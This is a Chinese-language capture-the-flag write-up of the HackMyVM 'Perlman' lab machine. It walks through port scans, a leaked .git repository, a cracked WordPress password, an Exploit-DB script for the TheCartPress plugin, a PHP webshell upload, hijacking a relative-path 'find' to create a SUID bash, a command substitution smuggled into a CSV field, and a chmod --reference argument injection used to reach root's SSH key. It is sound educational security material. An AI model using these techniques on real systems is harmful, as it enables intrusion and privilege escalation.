打靶记录(八六)之HMVPerlman

所渗透的靶机IP为192.168.56.106

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 06:32 UTC
Nmap scan report for 192.168.56.106 (192.168.56.106)
Host is up (0.00029s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
119/tcp open  nntp
995/tcp open  pop3s
MAC Address: 08:00:27:18:54:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.52 seconds

sudo nmap -sT -sV -sC -O -p22,25,80,110,119,995 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 06:32 UTC
Nmap scan report for 192.168.56.106 (192.168.56.106)
Host is up (0.00031s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:f4:7d:ad:5d:2a:25:ec:17:b5:62:b0:2e:a5:8d:4f (RSA)
|   256 f1:d8:01:07:9f:d7:8d:2e:da:a4:9f:36:a2:ff:2a:df (ECDSA)
|_  256 91:02:29:33:c5:ff:2d:d8:63:b8:47:f3:f3:d8:79:ac (ED25519)
25/tcp  open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=perlman
| Subject Alternative Name: DNS:perlman
| Not valid before: 2022-07-02T10:12:39
|_Not valid after:  2032-06-29T10:12:39
|_smtp-commands: perlman.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http     Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
| http-git: 
|   192.168.56.106:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: wp 
|_http-title: Sync - Mobile App Landing Page HTML Template
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES USER SASL(PLAIN) PIPELINING AUTH-RESP-CODE STLS CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=perlman
| Subject Alternative Name: DNS:perlman
| Not valid before: 2022-07-02T10:12:39
|_Not valid after:  2032-06-29T10:12:39
119/tcp open  nntp     InterNetNews (INN) 2.6.4
995/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) PIPELINING UIDL RESP-CODES AUTH-RESP-CODE USER CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=perlman
| Subject Alternative Name: DNS:perlman
| Not valid before: 2022-07-02T10:12:39
|_Not valid after:  2032-06-29T10:12:39
MAC Address: 08:00:27:18:54:B8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Hosts:  perlman.hmv, server.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

sudo nmap --script=vuln -p22,25,80,110,119,995 192.168.56.106  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 06:38 UTC
Nmap scan report for 192.168.56.106 (192.168.56.106)
Host is up (0.00025s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 2048
|             Generator Length: 8
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp  open  http
| http-git: 
|   192.168.56.106:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: wp 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-internal-ip-disclosure: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /.git/HEAD: Git folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.54 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.54 (debian)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.54 (debian)'
110/tcp open  pop3
119/tcp open  nntp
995/tcp open  pop3s
MAC Address: 08:00:27:18:54:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 32.07 seconds

似乎存在着邮件服务

先添加perlman.hmv,并扫描一下子域名,但是没有

信息搜集

访问80端口，是一个门户网站，扫描一下目录，并且在上面nmap的扫描结构中得知有.git泄露

上gitextract

python2 git_extract.py http://perlman.hmv/.git/

在users.sql.572f66中得到一个：

‘webmaster’,’$P$BCaMhRZQp/mi0nyIVVPS6u1EU8sTCR/‘

爆破得到凭证:webmaster:cookie

但是没有地方登录欸，那个门户网站似乎是没什么用。看看nntp服务,一个新闻组的服务（大概）

telnet perlman.hmv 119

LIST 列举所有的新闻组

GROUP perlman.hmv 使用perlman.hmv新闻组

HEAD 2 查看ID为2的文章

221 2 <tfi784$403$1@perlman.hmv> head
Path: server.example.net!.POSTED.192.168.0.27!not-for-mail
From: rita <rita@perlman.hmv>
Newsgroups: perlman.hmv
Subject: Whats up ?!
Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)
Organization: A poorly-installed InterNetNews site
Message-ID: <tfi784$403$1@perlman.hmv>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)
Injection-Info: perlman.hmv; posting-host="192.168.0.27";
        logging-data="4099"; mail-complaints-to="usenet@perlman.hmv"
User-Agent: Pan/0.151 (Butcha; a6f6327)
Xref: server.example.net perlman.hmv:2

是一个叫做rita的用户写的

那么登录她的邮件服务(POP3)，用之前得到的密码可以登录

telnet perlman.hmv 110
Trying 192.168.56.106...
Connected to 192.168.56.106.
Escape character is '^]'.
+OK Dovecot (Debian) ready.
USER rita
+OK
PASS cookie
+OK Logged in.

但是LIST发现0封邮件。。。

看WP的操作是需要以rita的身份发邮件来获得邮件

nc -v perlman.hmv 25
perlman.hmv [192.168.56.106] 25 (smtp) open
220 perlman.hmv ESMTP Postfix (Debian/GNU)
EHLO perlman.hmv
250-perlman.hmv
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
VRFY rita
252 2.0.0 rita
MAIL FROM:<rita>
250 2.1.0 Ok
RCPT TO:non_existent_user0123456789@gmail.com
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Hello
.
250 2.0.0 Ok: queued as 5B8044162C
quit
221 2.0.0 Bye

总之应该是会收到一封邮件的，但是不知道为什么我这里根本收不到,不管了，总之是得到一个itzhak.perlman.hmv的域名，添加进去就好了

访问得到是一个wordpress

Getshell

总之先扫描一下

wpscan --url=http://itzhak.perlman.hmv/ --enumerate vp,vt,tt,u

得到一个webmaster用户，但是发现这个WP似乎被改过，很多文件目录都没有了。登陆界面也不太一样

用webmaster:cookie的凭证也无法登录，但是抓包发现登录所请求的是POST /wp-content/plugins/thecartpress/checkout/login.php

用的是这个插件的登录功能

wpscan --url=http://itzhak.perlman.hmv/ --enumerate ap --plugins-detection aggressive --api-token=xxx

扫描发现这个插件确实是有漏洞，可以创建admin账户

searchsploit thecartpress

cp /usr/share/exploitdb/exploits/php/webapps/50378.py .

python 50378.py http://itzhak.perlman.hmv/

创建的用户是admin_02:admin1234

登录之后就是常规操作上传PHP马Getshell了

横向移动

得到数据库

wp_user:||LA0666||

但是没有什么用

我们可以切换至rita用户用cookie密码，复制一份私钥用于ssh连接

上传pspy查看进程，发现一个/bin/sh -c . $HOME/.profile ; /home/milou/clean.sh

这个脚本的内容：

#! /bin/bash


ext=(save bak bif old bck bkz sqb bak2)

for x in ${ext[@]}
do
cd /tmp && find . -type f -user $(whoami) -name "*.$x" -exec rm {} +
done

大概就是移动至/tmp目录然后用find指令寻找这些后缀的文件然后删除，然而这里的find指令用的是相对路径

我们可以在/tmp目录创建一个“find”指令来劫持

echo "cp /usr/bin/bash /tmp/bash  && chmod +xs /tmp/bash " >find

chmod +x find

./bash -p

OK，现在我们是milou!,做一个ssh后门

sudo -l发现可以用以perlman身份执行/home/ze_perlman/inventory

内容就是逐行来读取perl_store.csv

更改perl_store.csv为

item,brand,price,numb
CPU,AMD,3,550,x[$(cp /home/ze_perlman/.ssh/id_rsa /tmp/key ; chmod 777 /tmp/key)]
GPU,Nvidia,4,1150
SCREEN,Samsung,4,400
MOUSE,Razer,6,20
KEYBOARD,Logitech,95,7

$(…)是用于命令执行并将结果输出，x[]则是将$的输出作为元素存放在一个数组当中。最终达到命令执行的目的。神，太神了~

提权

用私钥连接perlman用户，sudo -l发现又可以用bash执行一个bk，并且任意参数

#! /bin/bash

vfy=$(</opt/vfy.txt)

backup(){

cp /etc/{passwd,shadow,sudoers} /opt/backup
cp ~/.ssh/id_rsa /opt/backup
chmod 700 /opt/backup/*
chmod 700 /root
chown root:root /usr/lib/news/*
chown root:root *
chown -R news:news /var/lib/news
chown -R www-data:www-data /var/www
}

[[ $1 == "${vfy/un/}" ]] && backup

vfy的内容是/opt/vfy.txt也就是undesired-root-2022

${vfy/un/}则是将vfy中的”un”替换成空字符,也就是说我们需要输入的参数为”desired-root-2022”

但是执行

sudo /bin/bash /opt/backup/bk desired-root-2022

之后得到的东西都没有权限访问，看WP

在/opt/backup

touch ref
touch "./--reference=ref"

再次执行

sudo /bin/bash /opt/backup/bk desired-root-2022

成功拿到root的私钥！

虽然不是很确定，个人猜测是创建一个检查点，当脚本执行到chmod 700 /opt/backup/*时会进行截断？于是就不会把文件的所有者改成root?

碎碎念

挺难的机器啊，打了好久。熟悉了下邮件服务，nntp服务之类的。Getshell还是比较常规的吧。内网部分真的好考察bash，还是挺抽象的。